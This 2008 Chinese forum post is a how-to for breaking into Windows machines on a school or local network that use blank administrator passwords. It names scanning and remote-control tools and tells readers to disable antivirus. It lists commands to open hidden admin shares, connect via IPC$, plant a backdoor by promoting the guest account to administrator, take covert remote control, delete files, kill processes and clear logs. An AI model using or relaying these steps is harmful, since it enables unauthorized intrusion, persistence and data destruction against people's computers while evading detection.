|
|
首先申明:
1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;
2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。
入侵工具:
一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。)
入侵步骤:
1.使用\"NTscan变态扫描器\",在IP处填上要扫描的IP范围,选择\"WMI扫描\"方式,按\"开始\"后就等扫描结果了。
2.使用\"Recton--D贺免杀专用版\"
选择\"CMD命令\"项,在\"CMD:\"中输入\"net share C$=C:\\\",即可开启远程主机的C盘共享,以此将\"C\"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入\"\\\\对方IP\\C$\",即可进入对方C盘。
选择\"Telnet\"项,在\"远程主机\"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在\"CMD选项\"中,执行命令:\"net share ipc$\",接着执行:\"net share admin$\",最后执行\"net use \\\\***.***.***.***\\IPC$ \"\" /user:administrator\"在*处填入你入侵的主机IP。
3.使用\"DameWare迷你中文版 4.5\",安装后点\"DameWare Mini Remote Control\",在\"帮助\"项中选择激活产品,输入注册信息,成功注册后,进入\"远程连接\"窗口,在\"主机\"处填入IP地址,点\"设置\",在\"服务安装选项\"中点\"编辑\"后,在\"通知对话框\"中去掉\"连接时通知\",在\"附加设置\"中全都不选,在\"用户选项\"中去掉\"启用用户选项菜单\"。设置完成好后,就可点\"连接\",在弹出的对话框中点\"确定\"后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。 注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份。
入侵步骤补充:
1.在以上第2步中,远程启动Telnet服务可以通过\"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动\"完成。
2.Recton--D贺免杀专用版还有其他功能,在\"进程\"项中,可以查看远程主机的进程,并可任意结束其中进程;在\"共享\"项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:\\,D:\\等,共享好后在地址栏中输入\"\\\\IP\\C$\",进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选\"日志\",清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。
3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先\"telnet IP\",telnet上去,键入y后输入的用户名\"administrator\",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):\"net share C$=C:\",共享system文件夹:\"net share c=c:\\winnt\\system32\",共享IPC$用:\"net share IPC$\"等,最后是关闭共享,关闭C盘共享:\"net share C$ /del\"。
4.为方便下次入侵,可以设置后门, 查看用户:\"net user\",激活guest用户
\"net user guest /active:yes\",更改guest的密码为poco:\"net user guest poco\",把guest的权限提升为管理员权限:\"net localgroup administrators guest /add\"。
5.telnet命令(DOS命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:\"\"dir d:\\\",查看C盘program file文件夹:\"dir c:\\PROGRA~1\\;\",60秒倒记时关机:\"shutdown -s -t 60\"
补充说明:
1.net use错误原因解决:
(1).\"发生系统错误 1326。 登录失败: 未知的用户名或错误密码。\"
在远程机的\"控制面板-文件夹选项-查看-简单的文件共享\",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接,是无法访问C$等管理共享的.
(2)\"发生系统错误 1327。 登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。\"在远程机的\"控制面板-管理工具-本地安全策略-安全选项-用户权限\"指派里,禁用\"空密码用户只能进行控制台登陆\".
(3)\"//IP/c$\"时提示找不到网络途径。在\"网络和拨号连接\"中\"本地连接\"中选取\"Internet协议(TCP/IP)\"属性,进入\"高级TCP/IP设置\"选\"WINS设置\"里面有一项\"启用TCP/IP的NETBIOS\".
|
|
发表于 2008-1-30 17:32:52